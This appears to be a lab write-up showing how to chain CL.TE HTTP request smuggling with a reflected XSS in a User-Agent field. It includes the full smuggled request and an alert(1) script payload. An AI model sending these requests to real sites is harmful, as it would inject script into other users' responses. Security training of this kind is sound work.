Lab: Exploiting HTTP request smuggling to deliver reflected XSS

After starting the exercise, the blog should look similar to the one shown in the following figure.

Now we select any blog entry and click on the View post button to open the entry. We then switch to Burp Suite and open Burp Proxy. In the HTTP history tab, we look for the request that was sent by clicking on the View post button. In this example, it is the request GET /post?postId=1 HTTP/2. In the Response section, we take a closer look at the following section.

<form action="/post/comment" method="POST" enctype="application/x-www-form-urlencoded">
                            <input required type="hidden" name="csrf" value="X256bMgz9lG1UiZLutZoox3qHHzFC7sU">
                            <input required type="hidden" name="userAgent" value="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36">
                            <input required type="hidden" name="postId" value="1">
                            <label>Comment:</label>
                            <textarea required rows="12" cols="300" name="comment"></textarea>
                                    <label>Name:</label>
                                    <input required type="text" name="name">
                                    <label>Email:</label>
                                    <input required type="email" name="email">
                                    <label>Website:</label>
                                    <input pattern="(http:|https:).+" type="text" name="website">
                            <button class="button" type="submit">Post Comment</button>
                        </form>

In line 3, we see that the value of our User-Agent header can be seen in a hidden <input> tag:

<input required type="hidden" name="userAgent" value="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36">

We now send this request to the Burp Repeater using the key combination CTRL + R and switch over there. We now insert the XSS payload (/><script>alert(1)</script>) into our User-Agent header. Our request should now look like this.

GET /post?postId=1 HTTP/2
Host: 0a490047030d29b48276ec3800a500d4.web-security-academy.net
Cookie: session=lAhFM7YJxG6YXBmvG0xyfa67J0NtaGVF
Sec-Ch-Ua: "Not_A Brand";v="99", "Chromium";v="142"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: de-DE,de;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: "/><script>alert(1)</script>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a490047030d29b48276ec3800a500d4.web-security-academy.net/
Accept-Encoding: gzip, deflate, br
Priority: u=0, i

We now send the request to the application and see in the response that a <script> tag (line 3) with the alert() function has been inserted there.

<form action="/post/comment" method="POST" enctype="application/x-www-form-urlencoded">
                            <input required type="hidden" name="csrf" value="X256bMgz9lG1UiZLutZoox3qHHzFC7sU">
                            <input required type="hidden" name="userAgent" value=""/><script>alert(1)</script>">
                            <input required type="hidden" name="postId" value="1">
                            <label>Comment:</label>
                            <textarea required rows="12" cols="300" name="comment"></textarea>
                                    <label>Name:</label>
                                    <input required type="text" name="name">
                                    <label>Email:</label>
                                    <input required type="email" name="email">
                                    <label>Website:</label>
                                    <input pattern="(http:|https:).+" type="text" name="website">
                            <button class="button" type="submit">Post Comment</button>
                        </form>

Now let's switch back to Burp Proxy and go to the HTTP history tab. There, we search for the request GET / HTTP/2 and send it to the Burp Repeater using the key combination CTRL + R.

In Burp Repeater, we now modify the request GET / HTTP/2. First, we change the HTTP method from GET to POST and from HTTP/2 to HTTP/1.1. Then we remove all headers except for Host, Content-Type and Content-Length. At the end of the request, we add the Transfer-Encoding header with the value chunked. Then we press the ENTER key twice and add a 0. The request should now look like this:

POST / HTTP/1.1
Host: 0a490047030d29b48276ec3800a500d4.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Transfer-Encoding: chunked

0

We now copy the second request and paste it into the first request. We then adjust the second request. To do this, we remove all headers except Host, User-Agent, Content-Type and Content-Length. The complete request should now look like this:

POST / HTTP/1.1
Host: 0a490047030d29b48276ec3800a500d4.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Transfer-Encoding: chunked

0

GET /post?postId=1 HTTP/1.1
User-Agent: a"/><script>alert(1)</script>
Content-Type: application/x-www-form-urlencoded
Content-Length: 5

x=1

We now send this request to the application and switch to the browser. There we wait a moment and refresh the browser tab. It may be necessary to repeat this process several times. When your request reaches the other user, the exercise is successfully completed.

Video solution